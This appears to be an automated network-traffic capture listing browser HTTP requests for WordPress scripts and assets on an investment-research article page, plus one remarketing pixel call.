Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.fade.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/hcaptcha-for-forms-and-more/assets/images/hcaptcha-div-logo.svg HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.sticky-kit.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/library/jquery.textillate.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.easing.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/modernizr.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.fitvids.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/wp-rocket/assets/js/lazyload/17.8.3/lazyload.min.js HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.fade.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.mousewheel.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.sticky-kit.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.ilightbox.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/library/jquery.textillate.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/wp-rocket/assets/js/lazyload/17.8.3/lazyload.min.js HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/modernizr.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/plugins/disable-gravity-forms-fields/disable-gf-fields.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ultimate-member/assets/js/um-gdpr.min.js?ver=2.9.1 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/plugins/wp-quicklatex/js/wp-quicklatex-frontend.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/printfriendly.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /px/smart/?c=2645100a8c95db0 HTTP/1.1Host: a.remarketstats.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/plugins/mailchimp-top-bar/assets/script.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-includes/js/underscore.min.js?ver=1.13.7 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-includes/js/wp-util.min.js?ver=d4c9c51d21a0c26e910ec9a6a2b06883 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/plugins/wp-quicklatex/js/wp-quicklatex-frontend.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/cache/min/1/wp-content/plugins/disable-gravity-forms-fields/disable-gf-fields.js?ver=1733842125 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ultimate-member/assets/libs/tipsy/tipsy.min.js?ver=1.0.0a HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ultimate-member/assets/libs/um-confirm/um-confirm.min.js?ver=1.0 HTTP/1.1Host: alphaarchitect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alphaarchitect.com/2024/12/long-term-expected-returns/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/ultimate-member/assets/js/um-gdpr.min.js?ver=2.9.1 HTTP/1.1Host: alphaarchitect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
